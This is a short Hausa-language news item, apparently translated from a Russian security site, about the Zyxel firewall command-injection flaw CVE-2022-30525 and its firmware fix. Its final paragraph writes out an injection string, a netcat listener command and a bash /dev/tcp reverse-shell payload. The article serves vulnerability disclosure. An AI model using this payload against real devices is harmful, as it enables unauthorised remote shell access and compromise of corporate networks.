An gano mummunan rauni (CVE-2022-30525) a cikin na'urorin Zyxel na jerin ATP, VPN da USG FLEX, waɗanda aka tsara don tsara ayyukan tacewar wuta, IDS da VPN a cikin kamfanoni, wanda ke ba da damar maharan na waje don aiwatar da lamba akan na'urar ba tare da haƙƙin mai amfani ba tare da tantancewa ba. Don kai hari, dole ne maharin ya iya aika buƙatu zuwa na'urar ta amfani da ka'idar HTTP/HTTPS. Zyxel ya gyara rauni a cikin sabunta firmware na ZLD 5.30. Dangane da sabis na Shodan, a halin yanzu akwai na'urori 16213 masu yuwuwa masu rauni akan hanyar sadarwar duniya waɗanda ke karɓar buƙatun ta HTTP/HTTPS.
Ana aiwatar da aiki ta hanyar aika umarni na musamman ga mai sarrafa gidan yanar gizo /ztp/cgi-bin/handler, ana samun dama ba tare da tantancewa ba. Matsalar tana faruwa ne saboda rashin tsaftace daidaitattun sigogin buƙatun lokacin aiwatar da umarni akan tsarin ta amfani da tsarin os.system da aka yi amfani da shi a ɗakin karatu na lib_wan_settings.py kuma ana aiwatar da shi lokacin sarrafa aikin setWanPortSt.
Misali, maharin zai iya wuce kirtan “; ping 192.168.1.210; wanda zai haifar da aiwatar da umarnin "ping 192.168.1.210" akan tsarin. Don samun damar yin amfani da harsashi na umarni, zaku iya kunna "nc -lvnp 1270" akan tsarin ku, sannan fara haɗin baya ta hanyar aika buƙatu zuwa na'urar tare da '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
source: budenet.ru